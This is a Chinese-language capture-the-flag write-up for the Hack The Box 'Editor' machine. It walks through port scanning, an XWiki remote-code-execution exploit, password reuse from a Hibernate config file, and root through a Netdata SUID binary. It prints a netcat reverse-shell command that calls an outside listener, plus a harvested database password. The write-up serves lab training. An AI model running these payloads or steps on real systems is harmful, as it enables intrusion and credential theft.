【hackthebox】Editor
一、端口扫描与主机信息
使用 naabu 工具进行端口扫描:
1 | ./naabu -host 10.10.11.80 -p 21,22,23,1433,1521,3306,3389,5432,5900,50070,50030,50000,27017,27018,11211,9200,9300,7001,7002,6379,5984,873,443,8000-9090,80-89,80,10000,8888,8649,8083,8080,8089,9090,7778,7001,7002,608 |
扫描结果:
- 开放端口:22、8080、80
二、域名解析记录
缺少域名解析记录,需补充相关信息。

三、漏洞信息与利用
下标标注的版本存在历史漏洞:
https://github.com/gunzf0x/CVE-2025-24893
漏洞利用过程:
1 | ~/桌/CVE-2025-24893-main ▓▒░ python3 CVE-2025-24893.py -t 'http://10.10.11.80:8080' -c 'busybox nc 10.10.16.65 9001 -e /bin/bash' |
反弹 Shell:
1 | └─# nc -lvvp 9001 |
四、敏感信息收集
目录结构 & 配置文件查看:
1 | xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls cache jetty-web.xml version.properties classes lib web.xml fonts observation xwiki.cfg hibernate.cfg.xml portlet.xml xwiki-locales.txt jboss-deployment-structure.xml sun-web.xml xwiki.properties |
Hibernate 配置文件可能包含:
- 数据库地址
- 数据库用户名密码(旧版本可能明文)
示例内容:
1 | <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property> <property name="hibernate.connection.username">xwiki</property> <property name="hibernate.connection.password">theEd1t0rTeam99</property> <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property> ... |
五、横向移动与权限提升
使用数据库密码尝试 SSH 登录:
1 | xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls |
六、SUID 文件检查与提权思路
常见 SUID 文件列表及说明:
1 | SUID - Check easy privesc, exploits and write perms |
重点关注:
- /opt/netdata 目录下存在多个未知 SUID 二进制文件
- 检查 sudo、passwd 等常见提权点
七、最终提权操作
**利用 SUID 文件提权:**https://github.com/AzureADTrent/CVE-2024-32019-POC
1 | oliver@editor:/tmp$ chmod +x nvme |
总结:
- 完成端口与主机信息收集
- 成功利用漏洞获取初始 shell
- 通过配置文件发现敏感信息并横向登录
- 检查 SUID 文件并实现提权
